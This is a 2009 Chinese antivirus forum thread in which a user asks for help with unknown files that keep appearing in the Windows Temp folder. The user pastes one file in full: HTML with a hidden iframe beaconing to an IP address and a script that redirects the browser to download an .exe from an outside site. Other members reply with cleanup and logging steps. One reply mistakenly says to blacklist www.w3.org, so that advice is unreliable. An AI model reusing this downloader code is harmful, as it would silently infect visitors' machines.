瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 在Temp文件夹里总是自动生成病毒
erlin000001 - 2009-1-18 17:19:00
在C:\Documents and Settings\Administrator\Local Settings\Temp文件夹里每次上网都生成很多没有后缀名字的文件,都是由7个随机数字的名字,其中有一半用记事本打开是乱码,另一半用记事本打开里面是      <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head></head><body><iframe id="timeFrm" src="about:blank" height=0 width=0 style="visibility:hidden" ></iframe><script type="text/javascript">var myTranFunc = function (){window.location="http://www.wixks.com/new/new10.exe";};function tranTime(){var a=new Date();document.getElementById("timeFrm").src="http://60.6.255.168/npserver/WebForm1.aspx?seq=" + a.getTime();}try{tranTime();window.setTimeout("myTranFunc()",10);}catch(e){ window.location="http://www.wixks.com/new/new10.exe";}</script><noscript><Meta http-equiv="Refresh" C></noscript></body><noframes><Meta http-equiv="Refresh" C></noframes></html>
其中网址后面的new10.exe可以下载,而其每个里面的名字都不一样,从new01.exe一直到new23.exe
我把这些文件都下了下来上传到附件里,不知道是什么病毒

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MAXTHON 2.0)

附件: 1.rar

附件: 2.rar

附件: 3.rar
aaccbbdd - 2009-1-18 17:28:00
个人建议不要偷懒,清理助手必须清理系统(如果可以运行的话),金山和sreng日志必须同时上传

1.扫日志前建议清理助手清理系统
清理助手下载
升级清理助手,全盘扫描,只清理报为病毒的高危险项目,其他项目请自己判断
同时观察清理助手是否报告系统文件被替换。(注:如发现系统文件被替换,请将情况报上来,勿自己随意操作。如自己私自替换的,导致不能进系统,责任自负)

如清理无效

2.扫日志前关闭无用进程,如QQ,迅雷及播放器程序
3.Sreng官方下载
SREng/智能扫描(记得勾选“检查进程的数字签名)
等扫描完成,保存日志(LOG格式)
PS:如主程序SREng**.exe无法运行,导致无法扫描日志
将主程序改名为我爱小狮子.bat
或我爱小狮子.scr
4.金山清理专家官方下载  | 免安装版直接运行版金山清理专家下载
金山清理专家-在线系统诊断(隐藏安全项)-导出诊断报告-(全选)-导出报告
5.2份日志/报告以附件上传(点击我这贴右下角的“引用”或最右下角的那个较大的“回复”然后就应该知道怎么发了。),贴到反病毒/反流氓软件论坛.如已发帖的请跟贴,勿另开新帖。

建议2份日志同时上传,起到互补的作用(原因:金山和SRENG都能扫出另一个不能扫出的内容)!!
erlin000001 - 2009-1-18 18:02:00


引用:
原帖由 aaccbbdd 于 2009-1-18 17:28:00 发表
个人建议不要偷懒,清理助手必须清理系统(如果可以运行的话),金山和sreng日志必须同时上传

1.扫日志前建议清理助手清理系统
清理助手下载
升级清理助手,全盘扫描,只清理报为病毒的高危险项目,其他项目请自己判断
同时观察清理助手是否报告


附件: Report.txt

附件: SREngLOG.log
aaccbbdd - 2009-1-18 18:06:00
金山清理专家-安全百宝箱-文件粉碎器
粉碎文件:
C:\windows\system32\kcffcgfg.dll

金山清理专家-在线系统诊断
隐藏安全项后
清除该项:
      <{4CFFC0F0-2162-4095-A3D7-E5316FBA9885}>            <C:\windows\system32\kcffcgfg.dll>
pigboy - 2009-1-18 18:12:00
开机先按F8进入安全模式清理C:\Documents and Settings\Administrator\Local Settings\Temp里面的所有垃圾文件;
      然后打开瑞星防火墙 详细设置--规则设置--黑名单  增加IP地址:58.253.68.65、60.6.255.168(名称随意)    在下面的恶意网址拦截--网站黑名单里分别增加http://www.w3.orghttp://58.253.68.65http://60.6.255.168等地址
    最后在IE安全项的受限站点里分别添加http://www.w3.orghttp://58.253.68.65http://60.6.255.168等地址  使用卡卡助手的清理功能进行清理一下即可
erlin000001 - 2009-1-18 19:49:00
没有找到你说的C:\windows\system32\kcffcgfg.dll
yebuxing - 2009-1-18 21:12:00
我的也出现这样的问题 好多天没有解决了 
这个是我的扫描报告

附件: SREng.log

附件: 清理专家诊断报告.txt
浪漫纸箱 - 2009-1-18 21:47:00
C:\windows\system32\kcffcgfg.dll
F:\paopaotang\泡泡堂机械帝国\GameGuard\npggNT.des
F:\paopaotang\泡泡堂机械帝国\CA.exe
建议将此三项按此路径上传至http://www.virustotal.com/zh-cn/  把结果报回此贴。
F:\paopaotang\泡泡堂机械帝国\CA.exe基本可以认为是恶意文件,如果瑞星最新版没有报毒,请将该文件打包发送到可以文件交流区。
浪漫纸箱 - 2009-1-18 22:00:00
七楼的同志,您的情况不大一致,请另行开贴。:default7:
maojijia - 2009-1-19 3:29:00
我的以前也有这种情况,我都从做啦系统,谢谢高手啊
1
查看完整版本: 在Temp文件夹里总是自动生成病毒
© 2000 - 2025 Rising Corp. Ltd.